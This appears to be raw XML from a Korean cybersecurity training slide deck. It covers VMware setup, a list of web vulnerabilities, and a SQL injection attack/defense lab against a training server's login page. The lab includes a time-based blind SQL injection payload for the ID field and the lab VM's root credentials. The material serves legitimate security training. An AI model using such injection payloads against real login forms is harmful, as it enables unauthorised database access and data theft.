          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드 받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VMware-player-16.1.0-17198959.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</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 진행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Next -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>동의 체크 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Next -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Workstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>system PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>체크 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Next -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Next-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Next-&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Install</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*  Ctrl + Alt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 누르면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 마우스 포인터가 빠져나올 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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504AC59B-8B20-47D5-9B24-622B1C57125B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="2195878"/>
            <a:ext cx="5466512" cy="618737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE16AD6-B9E6-41E1-A00A-83C95CCA5F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774999" y="3858895"/>
            <a:ext cx="2950750" cy="2320146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073513909"/>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7396738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557719937"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="2138868"/>
          <a:ext cx="8563556" cy="3201289"/>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SQL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다운로드 취약점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민감 데이터 노출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인증 및 세션 관리 취약점</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기능 수준의 접근 통제 누락</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Webshell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검증되지 않은 리 다이렉트 및 포워드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크로스 사이트 요청 변조</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(CSRF)</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알려진 취약점이 있는 컴포넌트 사용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bash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 설정 오류</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>웹</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5"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607C707D-ADA0-4152-BC84-72DB4986FFB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1BE2A8D2-6176-42B1-9BFE-82B1ACDDED1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D15D5C6-1CD1-47FA-ADCF-C88AD1EA81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EF909D85-8109-4C44-97E6-8E256B507CF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437956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6692568" y="1797549"/>
            <a:ext cx="4463112" cy="4427675"/>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웹 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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가즈아</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7" name="Picture 222">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A931CF-DED8-48DD-A0E3-FD16E8E2E1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1797549"/>
            <a:ext cx="5400040" cy="4594098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B636BA00-5214-4914-9DDC-24B593C8FC4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729AEBC-585C-4606-9747-48FAB5C64D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2535CE9-6441-4972-8013-64D85F9E12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619D753-25D2-49E3-B08C-0625E3E973A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6125400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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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현재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공격이 통하는 취약한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로그인 페이지를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로그인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유형</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5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7517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_x208263360">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B00F6A-AD78-4FCB-9CF9-B6765B6B2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5834" y="2237626"/>
            <a:ext cx="4725988" cy="3500438"/>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웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iceweasel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>프로그램 실행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인터넷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>http://web.navy.mil.kr/webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하여 피해 서버에 접속</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ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>admin' and if((select substring(database(),2,1)='w'),sleep(5),1) and ''=''#'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 입력</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>위의 구문에서 ‘는 모두 작은따옴표이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRP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4"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7169" name="_x211875000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{590C4B75-B199-4F38-A70C-651724128F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17329"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="496562" y="687314"/>
            <a:ext cx="5400675" cy="2070100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="_x211872920">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F70DF3-EFC1-461C-8A77-27208B282B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562" y="3218566"/>
            <a:ext cx="5400675" cy="22177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표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D01F36A-FDE7-447D-A088-E03203B3CFE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2745657426"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6332424" y="908530"/>
          <a:ext cx="4932807" cy="5125720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="180694559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rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>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rPr>
                        <a:t>] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>SQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 </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0457169"/>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rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격은 </a:t>
                      </a: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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>피해 웹 서버의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/var/www/html/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>webhack</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member_login_check.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>에서 적용되어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>를 통한 공격이다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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member_login_check.php</a:t>
                      </a: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rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고 사이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>:http://hackerschool.org/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>Sub_Html</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HS_Posting</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uid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>=43&gt;</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4756844"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336044989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패스워드 입력창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>hack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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로그인이 되는 화면</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    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</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265" name="_x208262160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F34ADC5-5571-4430-AA61-B1C076E30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506" y="638869"/>
            <a:ext cx="5446713" cy="2963863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11267" name="_x208262240">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7BE674-BBC6-4115-BEFE-2FFA0DEEF8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544" y="4043358"/>
            <a:ext cx="5400675" cy="2005013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11269" name="_x208263760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D910B2D9-FA37-47C0-9BC4-28A44007BB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6099" y="899261"/>
            <a:ext cx="5227638" cy="754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47570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(id: root  PW: root123)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>학생들은 각자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 바탕화면에 터미널 실행 한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>setup</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3" name="_x208262240">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9362FB-9ABE-4B4E-A3E4-C0C26FD15D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19" b="56225"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="508674" y="1074875"/>
            <a:ext cx="5383454" cy="1407934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>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063" y="3228048"/>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09783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/Training/Unit/Web/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방어 </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귀하의 웹 서버에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SQL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서버에 관리자로 로그인을 시도하고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SQL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설정을 변경하여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/php.ini: php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파일에서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방어할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유형</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
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId5"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9D65C705-1514-4350-BAC3-3688D665F63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61183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웹 서버에서         아이콘 클릭</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err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 악의적인 행위를 하는 패킷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접속한 웹 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
